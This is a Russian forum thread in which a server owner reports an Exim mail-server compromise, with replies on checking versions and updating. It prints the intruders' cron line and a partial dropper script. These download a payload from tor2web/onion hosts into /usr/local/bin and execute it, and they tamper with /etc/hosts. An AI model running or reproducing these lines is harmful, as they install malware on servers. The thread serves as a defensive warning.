Уязвимость очень высокого уровня в exim
Страницы: 1
Уязвимость очень высокого уровня в exim, Проверяем свои сервера и устанавливаем обновление срочно!
10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 [url]https://prnt.sc/nzqmhf[/url] скрин 2 [url]https://prnt.sc/nzq1ta[/url]
Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

Код
[CODE]  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]
   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7
29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld
в кроне такой код был

Код
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

Код
wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh
 и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

Код
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
    [ -r "$a" ] || continue
    [ "${a%%.lockfile}" = "$a" ] || continue
    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
или такой

Код
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
.................Не помещается ))...............

Может кому пригодится.
Подробно описано здесь https://firstvds.ru/blog/uyazvimost-v-pochtovom-servere-exim
Рекомендую хостинг в России от 115р.
Рекомендую хостинг в Европе от 70р.
Интернет-магазин

Комплексное SEO продвижение в поисковых системах Яндекс, Google

Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Цитата
андрей ирмишин пишет:
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Я думаю лучше обновиться, или вообще удалить с сервера если не пользуетесь.
Сначала проверьте свою версию Exim:

Debian/Ubuntu:
dpkg --list |grep exim 
CentOS:
rpm -qa |grep exim
У многих до сих пор версия 4,86, которую обновлять не обязательно пока. Да и значит вас проблема не коснулась. Проблема у: 4.87 до 4.91.
Изменено: Александр - 13 Июня 2019 15:11
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:04 ClickTimes.ru - самая выгодная монетизация WAP трафика 
14:19 Предлагаем посмотреть порно ролики даром - pornosexrolik.com 
12:46 Зарабатывай до 50% за сейл с партнерской программой EssayPro! 
09:13 Что можно улучшить 
22:34 Продвижение в ТОП Яндекс. Мега быстро! 
14:28 Berileads.ru - финансовая партнерская программа. 
19:38 Обновление поисковой базы 10.06.2019. 
17:03 Семантическое ядро по новой технологии + LSI с ручной группировкой 
15:29 Услуги постинга в социальные сети для продвижения, индексации и увеличения социальной активности 
14:45 Пишу софт, регеры, парсеры, рвссыльщики, граберы и пр на заказ 
12:53 "Спалю" тему как рекламироваться в Яндекс.Директ по гэмблинг (и другим) тематикам, помогу с прохождением модерации, отдам домен. 
10:59 Прогон по личной базе, больше 1000 трастовых сайтов! Продвижение СЧ и НЧ запросов + рост показателей! Гарантии! 
09:20 Продвижение сайтов максимально качественно, методы только белые, есть крутые кейсы!!! 
09:06 Пожалуйста оцените сайт форум 
19:35 Сколько можно заработать на сайте с 60к уник траффом в день 
19:16 Букмекерские ставки 
17:57 Наши машинки 
21:36 В поисках ПП (Партнёрской Программы) 
17:56 Инвайт на webmaster.ru please! 
15:03 Деньги на бизнес 
09:40 Сколько вы платите редактору?